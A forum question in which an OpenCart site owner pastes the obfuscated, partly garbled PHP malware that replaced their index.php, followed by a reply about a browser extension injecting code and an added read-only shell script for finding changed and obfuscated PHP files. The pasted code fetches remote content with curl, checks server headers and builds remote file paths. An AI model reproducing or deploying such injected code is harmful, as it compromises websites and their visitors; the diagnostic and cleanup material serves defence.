Opencart index.php file corrupted
P粉545956597 2023-08-30 12:23:26
<p>I'm using opencart v3.0.2.0 and the problem is that opencart's index.php file (the entry point to my opencart website, uploaded to the public_html directory) crashes (the code in the index.php file has changed to strange characters). This happened twice last week. I had no idea anyone had been hacked or that there was something wrong with my domain or code. If anyone can help or guide me please let me know. Thanks. </p> <p>Damaged index.php file:</p> <p>Global $O; $O=url decoding ($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9 ].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65]. $AO[67].$AO[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O [67].$O[65] .$O[63].$oOooOO.$O[63];FunctionooooooooOOOOOOOOoooooOOO($ooooOOOoOoo){ $ooooOOOooOo=curl_init();curl_setopt($ooooOOOooOo,CURLOPT_URL,$ooooOOOoOoo); curl_setopt($ooooOOOooOo,CURLOPT_RETURNTRANSFER,1);curl_setopt($ooooOOOooOo,CURLOPT_ CONNECTTIMEOUT, 5); $ooooOOOOooO =curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);return $ooooOOOOooO; } Function ooOOoOOO($Ooooo O,$Ooooooo= array()){ global $O;$OooooO=str_replace(' ',' ',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, " $OooooO");curl_setopt($OOooooO,CURLOPT_RETURNTRANSFER . ry($OOOOoo ));$OOOOooo=curl_exec($OOooooO);$OOOOoooo=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOooooOO){return false ;}return $OOOOooo ;} function oooOOOo($ ooOOo){global $O;$ooOOOOo = false;$oooooOOo = $O[14].$O[8].$O[8].$O[14]. $O[18].$O[2] .$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O [8].$O[14].$ O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8 ].$O[ 8].$O[ 90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10]. $O[8] .$O[18] ;if ($ooOOo!=''){if (preg_match("/($ooooooOOo)/si",$ooOOo)){$ooOOOOo=true;}} returns $ooOOOOo;} function oooOOooOOoOO ($oOOOOOOoOOOO){global $O;$ooOOOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O[ 59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90]. 
$O[5].$O[10] .$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O [59].$O[16].$ O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O[ 59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/ si", $oOOOOOOoOOOOOO )) {$ooOOOOOOoO= true;}Return $ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[ 35].$O [37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[ 8].$O[13].$O [13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62 ].$O[ 63].$O[ 63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63]. $O[63] );$oOoooOOoOO=$ _SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]];$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O [30].$ O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOoooOOoOO=$_SERVER[$O[ 35].$O [41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOooooOOOoOO=$ _SERVER[$O[ 37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50]. $O[36] .$O[51].$O[28]];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O[63].$O[7].$ O[24]。$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[ 9];$ooooOOOOoooOOOooO =$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15] .$O[9 ];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$ O[9]。$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[ 12].$O [11].$O</p>

reply all(1)
P粉020556231

I recently encountered a similar issue with one of my clients. Upon investigation, we found that the problem was caused by a Chrome browser extension that injects code into PHP files when uploading any PHP files through the browser (like cPanel File Management). In this case, the code was injected into the index.php file, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server's current URL and other data using the cURL function in PHP.

To resolve this issue, you can take the following steps:

1- Take a screenshot of any extensions in your browser that are used to upload files to the server, share them with us, and then delete the browser or all its extensions.

2- Check all files uploaded or updated to the server since the date of the hack. You can run commands on the server to get a list of new or updated files, depending on your operating system.

3- You may find some *.php files in the .well-known or other hidden folders on the server.

4- Protect your operating system with antivirus software. I recommend using non-free antivirus software such as Kaspersky.

Can you share a screenshot of your browser extension so we can determine which extension may have caused the site to be hacked?
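
Steps 2 and 3 of the reply above, written out as an added shell example; it is not part of the original post or of OpenCart. The script name `triage.sh`, the cutoff date and the eight-term threshold are assumptions chosen for illustration.

```sh
#!/bin/sh
# Added triage example for steps 2 and 3 above (read-only; deletes nothing).
# Assumptions: <webroot> is the site directory (e.g. public_html) and the
# cutoff is a constructed date in touch -t format, CCYYMMDDhhmm.

# Step 2: files whose modification time is later than the cutoff.
# mtime can be reset by whoever wrote the file, so treat an empty
# result as "nothing found", not as "clean".
changed_since() {
    ref=$(mktemp) || return 1
    touch -t "$2" "$ref"
    (cd "$1" && find . -type f -newer "$ref" -print | LC_ALL=C sort)
    rm -f "$ref"
}

# Step 3: PHP files below any dot-directory such as .well-known.
hidden_php() {
    (cd "$1" && find . -type f -name '*.php' -path '*/.*/*' -print |
        LC_ALL=C sort)
}

# Heuristic tied to the damaged index.php quoted in the question: eight or
# more chained single-character lookups of the form $O[15].$O[4].$O[4]...
# Legitimate code rarely builds strings this way; the threshold is a guess.
obfuscated_php() {
    (cd "$1" && find . -type f -name '*.php' -exec \
        grep -lE '(\$[A-Za-z_]+\[[0-9]+\]\.){8,}' {} + | LC_ALL=C sort)
}

# Usage (hypothetical script name): sh triage.sh /path/to/public_html 202308230000
if [ "$#" -eq 2 ]; then
    echo "== modified after $2 ==";           changed_since "$1" "$2"
    echo "== PHP in hidden directories ==";   hidden_php "$1"
    echo "== index-concatenation pattern =="; obfuscated_php "$1"
fi
```

Compare every file it lists against a clean copy of the same OpenCart release before restoring or deleting anything.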
